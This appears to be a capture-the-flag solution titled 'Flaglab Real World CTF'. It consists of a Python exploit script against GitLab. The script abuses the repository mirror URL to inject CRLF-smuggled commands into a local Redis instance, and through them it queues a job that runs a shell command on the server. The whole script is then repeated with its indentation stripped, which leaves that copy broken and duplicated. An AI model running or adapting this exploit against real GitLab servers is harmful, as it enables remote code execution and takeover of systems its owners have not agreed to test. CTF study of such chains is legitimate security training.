Flaglab Real World CTF

## exploit.py
#!/usr/bin/env python3

import requests
import sys
from bs4 import BeautifulSoup
from urllib.parse import urljoin
import random
import logging
import time

s = requests.Session()

def get_csrf_token(html):
    soup = BeautifulSoup(html)
    auth_token = soup.find("input", {"name": "authenticity_token"})
    return auth_token["value"]

def login(username, password):
    response = s.get(urljoin(target, '/users/sign_in'))

    token = get_csrf_token(response.text)

    data = {
      'user[login]': username,
      'user[password]': password,
      'authenticity_token': token
    }

    response = s.post(urljoin(target, '/users/sign_in'), data=data)
    assert(response.status_code == 200)

def execute_payload(username, project, payload):
    namespace = username
    response = s.get(urljoin(target, "/".join([namespace, project, 'settings/repository'])))
    token = get_csrf_token(response.text)

    url = 'git://[0:0:0:0:0:ffff:127.0.0.1]:6379/\r\n\n\n' + payload + '\n'
    data = {
        '_method': 'patch',
        'project[remote_mirrors_attributes][0][enabled]': '1',
        'project[remote_mirrors_attributes][0][only_protected_branches]': 'true',
        'project[remote_mirrors_attributes][0][uri]': url,
        'uri': url,
        'authenticity_token': token,
        'auth_metod': '',
        'password': ''
    }

    response = s.post(urljoin(target, "/".join([namespace, project, 'mirror'])), data=data)

    data = {
      '_method': 'post',
      'authenticity_token': token
    }

    response = s.post(urljoin(target, "/".join([namespace, project, 'mirror/update_now?sync_remote=true'])), data=data)

if __name__ == '__main__':
    if len(sys.argv) != 5:
        print("python3 exploit.py target username password projectname")
        sys.exit(1)

    target = sys.argv[1]
    username = sys.argv[2]
    password = sys.argv[3]
    projectname = sys.argv[4]
    jid = ''.join(random.choice('0123456789abcdeg') for n in range(24))
    payload = """
multi

sadd resque:gitlab:queues system_hook_push

lpush resque:gitlab:queue:system_hook_push "{\\"class\\":\\"GitlabShellWorker\\",\\"args\\":[\\"classeval\\",\\"open(\\'|whoami > /tmp/a \\').read\\"],\\"retry\\":3,\\"queue\\":\\"system_hook_push\\",\\"jid\\":\\"%s\\",\\"created_at\\":1513714403.8122594,\\"enqueued_at\\":1513714403.8129568}"

exec

exec

""" % jid
    login(username, password)
    execute_payload(username, projectname, payload)
	#!/usr/bin/env python3

	import requests
	import sys
	from bs4 import BeautifulSoup
	from urllib.parse import urljoin
	import random
	import logging
	import time

	s = requests.Session()

	def get_csrf_token(html):
	soup = BeautifulSoup(html)
	auth_token = soup.find("input", {"name": "authenticity_token"})
	return auth_token["value"]

	def login(username, password):
	response = s.get(urljoin(target, '/users/sign_in'))

	token = get_csrf_token(response.text)

	data = {
	'user[login]': username,
	'user[password]': password,
	'authenticity_token': token
	}

	response = s.post(urljoin(target, '/users/sign_in'), data=data)
	assert(response.status_code == 200)

	def execute_payload(username, project, payload):
	namespace = username
	response = s.get(urljoin(target, "/".join([namespace, project, 'settings/repository'])))
	token = get_csrf_token(response.text)

	url = 'git://[0:0:0:0:0:ffff:127.0.0.1]:6379/\r\n\n\n' + payload + '\n'
	data = {
	'_method': 'patch',
	'project[remote_mirrors_attributes][0][enabled]': '1',
	'project[remote_mirrors_attributes][0][only_protected_branches]': 'true',
	'project[remote_mirrors_attributes][0][uri]': url,
	'uri': url,
	'authenticity_token': token,
	'auth_metod': '',
	'password': ''
	}

	response = s.post(urljoin(target, "/".join([namespace, project, 'mirror'])), data=data)

	data = {
	'_method': 'post',
	'authenticity_token': token
	}

	response = s.post(urljoin(target, "/".join([namespace, project, 'mirror/update_now?sync_remote=true'])), data=data)

	if __name__ == '__main__':
	if len(sys.argv) != 5:
	print("python3 exploit.py target username password projectname")
	sys.exit(1)

	target = sys.argv[1]
	username = sys.argv[2]
	password = sys.argv[3]
	projectname = sys.argv[4]
	jid = ''.join(random.choice('0123456789abcdeg') for n in range(24))
	payload = """
	multi

	sadd resque:gitlab:queues system_hook_push

	lpush resque:gitlab:queue:system_hook_push "{\\"class\\":\\"GitlabShellWorker\\",\\"args\\":[\\"classeval\\",\\"open(\\'\|whoami > /tmp/a \\').read\\"],\\"retry\\":3,\\"queue\\":\\"system_hook_push\\",\\"jid\\":\\"%s\\",\\"created_at\\":1513714403.8122594,\\"enqueued_at\\":1513714403.8129568}"

	exec

	exec

	""" % jid
	login(username, password)
	execute_payload(username, projectname, payload)